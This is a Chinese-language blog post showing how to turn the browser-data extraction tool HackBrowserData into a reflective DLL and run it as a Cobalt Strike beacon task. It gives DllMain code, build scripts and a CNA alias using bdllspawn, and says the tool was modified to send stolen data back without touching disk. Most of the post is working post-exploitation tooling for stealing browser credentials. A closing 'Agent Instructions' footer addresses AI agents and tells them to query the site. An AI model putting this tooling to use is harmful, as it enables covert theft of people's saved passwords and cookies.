# Go项目反射改造 ## 简介 反射加载也没什么好说的,突然一时兴起想试一下能不能搞出来go的反射模块,发现已经有师傅铺好了路,这里手动@[WBGlIl](https://github.com/WBGlIl)师傅,选了用[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)项目。 ## 过程 首先修改一些默认选项,删除一些字符串,指定输出格式json,开启压缩存储。 ![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVec4uIf8er71oshyRX%2Fimage.png?alt=media\&token=a0801dd9-ab3a-4f94-a244-9093a5e938ca) 复制一个main函数命名为run,导出它。 ![注意上面的注释是参与编译的,声明导出。](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeccDCg-lA-hMrW_wB%2Fimage.png?alt=media\&token=70a15742-30eb-4d1d-8b05-7b6b9a78b3ea) 添加如下文件。 ``` //dllmain.def EXPORTS run ReflectiveLoader //dllmain.c #include "dllmain.h" #include #include #define DLL_QUERY_HMODULE 6 extern HINSTANCE hAppInstance; BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) { BOOL bReturnValue = TRUE; switch( dwReason ) { case DLL_QUERY_HMODULE: if( lpReserved != NULL ) *(HMODULE *)lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; run(); fflush(stdout); ExitProcess(0); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; } //dllmain.go package main //#include "dllmain.h" //#include "ReflectiveLoader.h" import "C" //ReflectiveLoader.h 这玩意就省略了... ``` 然后使用如下bat编译。 ``` //x64 del dllmain.a set GOARCH=amd64 go build -a -v --gcflags=-trimpath=$GOPATH -asmflags=-trimpath=$GOPATH -ldflags "-w -s" -buildmode=c-archive -o dllmain.a gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll move dllmain.dll reflective_dll.x64.dll //x32 set GOARCH=386 set CGO_ENABLED=0 set path=E:\mingw32\bin\;%path% go build --ldflags "-s -w" -buildmode=c-archive -o dllmain.a gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll move dllmain.dll reflective_dll.dll ``` 然后改造下这个项目,让他不落地回传数据,这部分代码就不贴了。 ![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVegEuo4rCtt4yM7SKw%2Fimage.png?alt=media\&token=27f37067-7060-4e54-af7d-a869de4b0543) ## 效果 都先patch一下。 ![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeeMMwm0LDuz1wJ1z_%2Fimage.png?alt=media\&token=4a126924-f2c8-426c-800e-737e71358659) 都能跑起来。 ![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeec-Q_UUtEGkKOSpo%2Fimage.png?alt=media\&token=85a8d028-6e6d-47c0-8072-211b839c66a1) 编写cna脚本。 ``` alias hackDataBrowers { local('$dll'); btask($1, "Task Beacon to run HackDataBrowers", "T9999"); if (-is64 $1) { $dll = getFileProper(script_resource("resources"), "reflective_dll.x64.dll"); } else { $dll = getFileProper(script_resource("resources"), "reflective_dll.dll"); } bdllspawn($1, $dll , $2, "Get Browers Data", 5000, false); } ``` ### 遗留问题 这玩意体积太大了,cs的反射函数直接罢工。。。。。 ## LINKS {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://idiotc4t.com/weaponization/go-xiang-mu-fan-she-gai-zao.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.